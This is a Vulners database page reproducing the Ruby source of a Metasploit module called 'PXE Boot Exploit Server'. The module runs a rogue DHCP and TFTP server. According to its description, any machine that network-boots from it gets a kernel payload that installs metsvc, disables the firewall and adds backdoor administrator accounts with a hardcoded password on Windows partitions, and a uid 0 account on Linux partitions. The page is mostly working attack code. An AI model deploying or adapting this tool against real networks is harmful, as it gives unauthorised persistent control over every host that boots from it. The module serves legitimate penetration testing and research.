Lucene search
K

PXE Boot Exploit Server

🗓️ 11 Feb 2015 18:38:38Reported by scriptjunkieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 35 Views

PXE Boot Exploit Server with Linux Kernel and metsvc Payloa

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::TFTPServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'PXE Boot Exploit Server',
      'Description'    => %q{
        This module provides a PXE server, running a DHCP and TFTP server.
        The default configuration loads a linux kernel and initrd into memory that
        reads the hard drive; placing a payload to install metsvc, disable the
        firewall, and add a new user metasploit on any Windows partition seen,
        and add a uid 0 user with username and password metasploit to any linux
        partition seen. The windows user will have the password p@SSw0rd!123456
        (in case of complexity requirements) and will be added to the administrators
        group.

        Note: the displayed IP address of a target is the address this DHCP server
        handed out, not the "normal" IP address the host uses.
      },
      'Author'      => [ 'scriptjunkie' ],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Service', 'Description' => 'Run PXE server' ]
        ],
      'PassiveActions' =>
        [
          'Service'
        ],
      'DefaultAction'  => 'Service',
      'DefaultOptions' => {
        'FILENAME' => 'update1',
        'SERVEONCE' => true # once they reboot; don't infect again - you'll kill them!
      }
    )

    register_advanced_options(
      [
        OptString.new('TFTPROOT',   [ false,  'The TFTP root directory to serve files from',
          File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')]),
        OptString.new('SRVHOST',   [ false,  'The IP of the DHCP server' ]),
        OptString.new('NETMASK',   [ false,  'The netmask of the local subnet', '255.255.255.0' ]),
        OptString.new('DHCPIPSTART',   [ false,  'The first IP to give out' ]),
        OptString.new('DHCPIPEND',   [ false,  'The last IP to give out' ])
      ])
  end

  def run
    print_status("Starting TFTP server...")
    @tftp = Rex::Proto::TFTP::Server.new
    @tftp.set_tftproot(datastore['TFTPROOT'])
    @tftp.start
    add_socket(@tftp.sock)

    print_status("Starting DHCP server...")
    @dhcp = Rex::Proto::DHCP::Server.new( datastore )
    @dhcp.report do |mac, ip|
      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} "+
          "(#{Rex::Socket.addr_ntoa(ip)})")
      report_note(
        :type => 'PXE.client',
        :data => mac.unpack('H2H2H2H2H2H2').join(':')
      )
    end
    @dhcp.start
    add_socket(@dhcp.sock)

    # Wait for finish..
    @tftp.thread.join
    @dhcp.thread.join

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation